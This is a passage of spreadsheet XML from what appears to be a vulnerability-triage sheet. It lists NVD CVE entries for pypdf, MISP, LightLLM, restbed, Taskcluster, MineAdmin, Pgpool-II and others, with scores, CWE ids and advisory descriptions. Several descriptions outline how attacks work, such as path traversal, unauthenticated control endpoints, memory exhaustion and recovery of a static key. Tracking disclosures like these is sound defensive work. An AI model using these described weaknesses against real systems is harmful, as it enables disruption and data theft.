        <v>8.699999999999999</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.18.1, a crafted PDF containing a partially malformed /FlateDecode stream with padded data can force pypdf/filters.py to use inefficient byte-by-byte decompression while the earlier recovery counter fails to advance for bytes that successfully decode, causing long runtimes and application unavailability. This is a residual issue after the malformed FlateDecode recovery fix. This issue is fixed in version 6.18.1.</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102997</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102998</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S89" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.19.0, a crafted PDF with form field values can cause pypdf/generic/_appearance_stream.py appearance-stream generation to repeat invariant selection-data work inside a loop when an application updates fields with flattening enabled, resulting in excessive runtimes and application unavailability. This issue is fixed in version 6.19.0.</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102998</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102999</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="S90" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.19.0, a crafted PDF containing many embedded files can cause the dictionary-based attachments API in pypdf/_doc_common.py to reparse the full attachment list for each content lookup, producing repeated work and long runtimes when an application accesses the embedded-file mapping. This issue is fixed in version 6.19.0.</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102999</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103000</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S91" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.19.0, a crafted PDF can provide unusually large alphabetical page-label values that cause pypdf/_page_labels.py to generate strings beyond a reasonable page-label length when an application retrieves document page labels, consuming excessive memory and potentially making the application unavailable. This issue is fixed in version 6.19.0.</t>
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103000</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103235</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-915</t>
        </is>
      </c>
      <c r="S92" s="5" t="inlineStr">
        <is>
          <t>MISP contains a mass assignment vulnerability in the event delegation feature. When a user with delegation permission submits a delegation request, the application authorized the user against the event identified in the URL but then persisted the entire submitted record, including caller-supplied fields such as the primary key and event_id.
An authenticated attacker could inject a primary key or event_id into the delegation payload to retarget an existing delegation record to any event on the instance. Because a delegation row grants the requesting organisation read access to the event it references, this effectively granted read access to arbitrary events belonging to other organisations. If the target organisation subsequently accepted the delegation, ownership of the event was transferred and the original record was deleted.
Preconditions:
- An authenticated user with the delegation permission (perm_delegate)
- The MISP.delegation server setting must be enabled
Impact:
- Confidentiality: read access to any event on the instance
- Integrity: overwriting existing delegation records and transferring event ownership
Affected versions: MISP &lt; 2.5.48</t>
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103235</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103270</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S93" s="5" t="inlineStr">
        <is>
          <t>LightLLM through 1.2.0 mounts reinforcement learning control routes on the public HTTP API without authentication checks. Unauthenticated attackers can call endpoints like /pause_generation, /abort_request, /flush_cache, and /init_weights_update_group to disrupt inference operations and wedge workers on deployments started with --enable_rl.</t>
        </is>
      </c>
      <c r="T93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103270</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103471</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S94" s="5" t="inlineStr">
        <is>
          <t>restbed through 5.0.0 buffers HTTP request headers without enforcing a maximum size limit, allowing remote unauthenticated attackers to exhaust server memory. Attackers can open TCP connections and stream bytes indefinitely without sending the header delimiter, forcing the server to allocate unbounded heap memory until the process is killed.</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103471</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10764</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>4237bc98-ed97-4aeb-8e67-37a47a9e179d</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="inlineStr"/>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S95" s="5" t="inlineStr">
        <is>
          <t>Information disclosure in BVMS 4.5 up to 12.3 including allows man-in-the-middle attackers to gain unauthorized access to sensitive data.</t>
        </is>
      </c>
      <c r="T95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10764</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47097</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="inlineStr"/>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S96" s="5" t="inlineStr">
        <is>
          <t>AJA HELO Plus firmware before 2.1.7 contains an information disclosure vulnerability that allows unauthenticated attackers to decrypt sensitive diagnostics bundles by exploiting a static AES passphrase embedded in obfuscated form within the firmware. Attackers can reverse engineer the publicly available firmware image to recover the shared passphrase and decrypt diagnostics export bundles retrieved from the unauthenticated diagnostics endpoint on any affected device, exposing highly sensitive server information.</t>
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47097</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55094</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-250, CWE-306, CWE-94, CWE-95</t>
        </is>
      </c>
      <c r="S97" s="5" t="inlineStr">
        <is>
          <t>Taskcluster is the task execution framework that supports Mozilla's continuous integration and release processes. Prior to version 100.3.0, Taskcluster is vulnerable to unauthenticated RCE on Taskcluster deployments with an anonymous role that exposes the GraphQL endpoint and parses filter arguments using the sift library. This issue has been patched in version 100.3.0.</t>
        </is>
      </c>
      <c r="T97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55094</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55224</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S98" s="5" t="inlineStr">
        <is>
          <t>MineAdmin is a ready-to-use backend management system suitable for quickly building website backends, operation platforms, permission centers, internal management systems, CMS, CRM, OA, ERP and other business applications. Prior to version 3.2.0-alpha.2, the app-store plugin service concatenates unsanitized user-supplied identifier values directly into file system paths. An attacker can use path traversal sequences (e.g., ../) to read, install, or uninstall plugins from arbitrary directories, and potentially execute arbitrary composer commands. This issue has been patched in version 3.2.0-alpha.2.</t>
        </is>
      </c>
      <c r="T98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55224</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76992</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="inlineStr"/>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S99" s="5" t="inlineStr">
        <is>
          <t>The CODESYS Gateway Client allocates memory based on a size field in a gateway response without enforcing an appropriate upper limit. An unauthenticated remote attacker controlling a malicious gateway can exploit this behavior to trigger excessive memory consumption, resulting in a denial-of-service condition thus leading to a total loss of availablity.</t>
        </is>
      </c>
      <c r="T99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76992</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82826</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="inlineStr"/>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr"/>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="S100" s="5" t="inlineStr">
        <is>
          <t>Hitachi Coding Software Suite contains a vulnerability related to the Cleartext Transmission of Sensitive Information which allows an attacker to eavesdrop on with authentication credentials and sensitive data in transit.
This issue affects Hitachi Coding Software Suite: through 3.3.0.</t>
        </is>
      </c>
      <c r="T100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82826</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82828</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="inlineStr"/>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr"/>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q101" s="5" t="inlineStr"/>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S101" s="5" t="inlineStr">
        <is>
          <t>Hitachi Coding Software Suite contains an Incorrect Authorization vulnerability that allows an unprivileged user to perform administrator-level operations.
This issue affects Hitachi Coding Software Suite: through 3.3.0.</t>
        </is>
      </c>
      <c r="T101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82828</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92867</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="inlineStr"/>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr"/>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q102" s="5" t="inlineStr"/>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S102" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write vulnerability exists in Pgpool-II , which may allow an authenticated attacker to cause abnormal process termination or arbitrary code execution.</t>
        </is>
      </c>
      <c r="T102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92867</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92870</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="inlineStr"/>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr"/>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q103" s="5" t="inlineStr"/>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S103" s="5" t="inlineStr">
        <is>
          <t>A stack-based buffer overflow vulnerability exists in Pgpool-II, which may allow an unauthenticated attacker to cause abnormal process termination.</t>
        </is>
      </c>
      <c r="T103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92870</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
